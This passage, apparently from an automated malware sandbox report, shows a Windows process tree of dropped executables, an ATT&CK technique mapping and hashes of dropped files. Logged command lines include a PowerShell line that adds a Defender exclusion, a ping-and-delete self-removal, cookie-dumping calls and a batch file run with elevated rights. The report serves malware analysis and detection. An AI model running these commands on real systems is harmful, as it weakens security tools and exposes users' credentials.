                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6320
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:5772
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4976
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1144
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:7032
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eod4stnl.l05\toolspab1.exe & exit
                                                                                                        6⤵
                                                                                                          PID:6556
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\eod4stnl.l05\toolspab1.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\eod4stnl.l05\toolspab1.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5140
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\eod4stnl.l05\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\eod4stnl.l05\toolspab1.exe
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4832
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zpgqb4dz.nog\GcleanerWW.exe /mixone & exit
                                                                                                          6⤵
                                                                                                            PID:6344
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eo15m5me.yvf\42a25820.exe & exit
                                                                                                            6⤵
                                                                                                              PID:4920
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\eo15m5me.yvf\42a25820.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\eo15m5me.yvf\42a25820.exe
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5424
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4212
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                        3⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4748
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1
                                                                                                          4⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:6068
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks whether UAC is enabled
                                                                                                      PID:5696
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6692
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5324
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6404
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1028
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6756
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                    1⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1004
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                      2⤵
                                                                                                      • Checks processor information in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Modifies registry class
                                                                                                      PID:3972
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                      2⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Checks processor information in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Modifies registry class
                                                                                                      PID:492
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4668
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:4728
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:5884
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    PID:6952
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:5936
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:6304
                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                    1⤵
                                                                                                    • Enumerates connected drives
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:5488
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 6FFC8C2036AA34BD5E9627D95C3C8145 C
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5804
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 6E8CF32DBB7F1ECB2454D3C90DD5E0D6
                                                                                                      2⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Loads dropped DLL
                                                                                                      PID:6260
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                        3⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5648
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding F04EF644E47C3B4241038E2835AB63B7 E Global\MSI0000
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5712
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:6272
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:3452
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\98F0.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\98F0.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Windows security modification
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:6088
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\312397cf-78bf-43c4-a376-1084d30fe134\AdvancedRun.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\312397cf-78bf-43c4-a376-1084d30fe134\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\312397cf-78bf-43c4-a376-1084d30fe134\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6616
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\312397cf-78bf-43c4-a376-1084d30fe134\AdvancedRun.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\312397cf-78bf-43c4-a376-1084d30fe134\AdvancedRun.exe" /SpecialRun 4101d8 6616
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5260
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\98F0.exe" -Force
                                                                                                      2⤵
                                                                                                        PID:6268
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                        2⤵
                                                                                                          PID:6216
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout 1
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:5604
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\98F0.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\98F0.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4708
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 1616
                                                                                                          2⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Program crash
                                                                                                          PID:5264
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5992
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:3916
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:6252
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:6348
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:1648
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:6488
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:3272
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:5084
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:7064
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:7044
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:2288
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:6932
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:5416
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:6004
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                          1⤵
                                                                                                                            PID:3160

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                          Persistence

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          1
                                                                                                                          T1060

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Defense Evasion

                                                                                                                          Disabling Security Tools

                                                                                                                          3
                                                                                                                          T1089

                                                                                                                          Modify Registry

                                                                                                                          6
                                                                                                                          T1112

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Install Root Certificate

                                                                                                                          1
                                                                                                                          T1130

                                                                                                                          Credential Access

                                                                                                                          Credentials in Files

                                                                                                                          2
                                                                                                                          T1081

                                                                                                                          Discovery

                                                                                                                          Software Discovery

                                                                                                                          1
                                                                                                                          T1518

                                                                                                                          Query Registry

                                                                                                                          5
                                                                                                                          T1012

                                                                                                                          System Information Discovery

                                                                                                                          6
                                                                                                                          T1082

                                                                                                                          Security Software Discovery

                                                                                                                          1
                                                                                                                          T1063

                                                                                                                          Peripheral Device Discovery

                                                                                                                          2
                                                                                                                          T1120

                                                                                                                          Remote System Discovery

                                                                                                                          1
                                                                                                                          T1018

                                                                                                                          Collection

                                                                                                                          Data from Local System

                                                                                                                          2
                                                                                                                          T1005

                                                                                                                          Command and Control

                                                                                                                          Web Service

                                                                                                                          1
                                                                                                                          T1102

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files\VideoLAN\BQJZLQSTLY\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\VideoLAN\BQJZLQSTLY\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\install.dat
                                                                                                                            MD5

                                                                                                                            806c3221a013fec9530762750556c332

                                                                                                                            SHA1

                                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                            SHA256

                                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                            SHA512

                                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                          • C:\Program Files\install.dll
                                                                                                                            MD5

                                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                            SHA1

                                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                            SHA256

                                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                            SHA512

                                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\5O513951.cookie
                                                                                                                            MD5

                                                                                                                            cf5920287e9b61ddaef5a666629b470a

                                                                                                                            SHA1

                                                                                                                            bd6dc3fbb8e3381cdb3278264b087b7f3332dfbc

                                                                                                                            SHA256

                                                                                                                            90d97cef8b72d330351cb8631eafb2eaf23aae9baeb87e2fd48b9fb51cc01e0e

                                                                                                                            SHA512

                                                                                                                            72624bc9e3d60af81842b4af4e2ea3db59b672bf009eed60a1078621a5d458360b0e84ccb8d5c75fb5e3e69b045c81873e39dc3a91ee164c46fd8057ca17e760

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\A4B70N1S.cookie
                                                                                                                            MD5

                                                                                                                            e4aff7cf94bbd64c27fd63c7e5de9bb6

                                                                                                                            SHA1

                                                                                                                            643a8b485e87a74b84965eb00c14920b87255e48

                                                                                                                            SHA256

                                                                                                                            e9665a78e55f4c55e3f55a2027b4514b5e2834ac48f462083b2627d4e4565663

                                                                                                                            SHA512

                                                                                                                            44308790b0b7426d58fded3e045e60eb78bf516b03ff95e7b4dd8298e02f9741da6dd7becbef93e444dbf530381d67b16d0f64af9859d7295dbf0723ff353619

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                            MD5

                                                                                                                            21b384ab8f79242a8b66c0d2bcf28d14

                                                                                                                            SHA1

                                                                                                                            2c0a75ba21188dfbb1e5d26361bb7f4ccb5f1c3a

                                                                                                                            SHA256

                                                                                                                            7b4888ca877ce314415b04b92dffe7acf5f656b99908c9c0e174722b2e2386a4

                                                                                                                            SHA512

                                                                                                                            a3210cbde79ef024a5b17526b51f22c2ae86b03322e8cc06d8c8ad9c74d5ba7aeef792498198f21d43785b784f463126f686fe14396aef5ccecab63f61530e7e

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                            MD5

                                                                                                                            ce540df2497e8fa3b3d096c9e6a6924f

                                                                                                                            SHA1

                                                                                                                            2eab5f7d9ea5ed63725bdd51c430155ab0b1143e

                                                                                                                            SHA256

                                                                                                                            20fe652f11599584c535699fe40c41aa313198ae74f7c5e413fe89b76816f126

                                                                                                                            SHA512

                                                                                                                            b99bc6f33443deefd0c8fd54afb29e2357224fef02ca45caac085d76af1a90eb275006297a28c7255f6bc8919e97c1c4e162a8ce327df1bb46b4f939512a04b7

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3rpwv5yh.lqa\001.exe
                                                                                                                            MD5

                                                                                                                            fa8dd39e54418c81ef4c7f624012557c

                                                                                                                            SHA1

                                                                                                                            c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                            SHA256

                                                                                                                            0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                            SHA512

                                                                                                                            66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3rpwv5yh.lqa\001.exe
                                                                                                                            MD5

                                                                                                                            fa8dd39e54418c81ef4c7f624012557c

                                                                                                                            SHA1

                                                                                                                            c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                            SHA256

                                                                                                                            0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                            SHA512

                                                                                                                            66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5mkr0w4q.qnp\KiffMainE1.exe
                                                                                                                            MD5

                                                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                            SHA1

                                                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                            SHA256

                                                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                            SHA512

                                                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5mkr0w4q.qnp\KiffMainE1.exe
                                                                                                                            MD5

                                                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                            SHA1

                                                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                            SHA256

                                                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                            SHA512

                                                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\83-653a9-8cb-01495-3400a06ec1b4d\Laesaefaedisha.exe
                                                                                                                            MD5

                                                                                                                            3ff7832ac6c44aea5e9652a33d5050ad

                                                                                                                            SHA1

                                                                                                                            cbf63d3811674b4fb2249f84d91528f1f3f158a2

                                                                                                                            SHA256

                                                                                                                            9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

                                                                                                                            SHA512

                                                                                                                            7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\83-653a9-8cb-01495-3400a06ec1b4d\Laesaefaedisha.exe
                                                                                                                            MD5

                                                                                                                            3ff7832ac6c44aea5e9652a33d5050ad

                                                                                                                            SHA1

                                                                                                                            cbf63d3811674b4fb2249f84d91528f1f3f158a2

                                                                                                                            SHA256

                                                                                                                            9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

                                                                                                                            SHA512

                                                                                                                            7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\83-653a9-8cb-01495-3400a06ec1b4d\Laesaefaedisha.exe.config
                                                                                                                            MD5

                                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                                            SHA1

